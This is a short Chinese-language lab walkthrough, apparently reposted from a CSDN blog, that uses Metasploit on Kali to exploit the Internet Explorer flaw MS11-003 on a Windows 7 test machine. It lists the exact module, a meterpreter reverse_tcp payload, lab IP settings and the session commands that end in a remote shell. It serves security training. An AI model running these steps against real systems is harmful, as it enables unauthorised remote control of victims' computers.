标签:10.20 set sessions windows Win7 003 29.129 ms11
前言:
windows7IE溢出攻击
实验环境:
工具:metasploit
靶机两台:windows 7和kali2020
攻击机IP地址:10.20.29.129
被攻击机IP地址:10.20.29.134
步骤:
1、在kali里面打开metasploit漏洞利用框架
2、搜索ms11-003漏洞利用模块
3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import
4、设置payload set payload windows/meterpreter/reverse_tcp
5、查看options
6、配置options信息(SRVHOST、LHOST均为Kali IP、URIPATH+任意数)
set srvhost 10.20.29.129
set lhost 10.20.29.129
set uripath 8
7、开始攻击 run/exploite,会生成一个URL,复制链接使用Windows7 IE浏览器访问
8、打开windows 7 并进行访问
9、这时kali虚拟机出现这种情况说明连接成功
10、查看session会话
11、sessions -i 1 连接windows7
选择sessions会话的时候可能会连接不成功,那么换一个sessions即可
12、获取shell,并输入ipconfig
标签:10.20,set,sessions,windows,Win7,003,29.129,ms11 来源: https://blog.csdn.net/qq_50854662/article/details/117296466
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。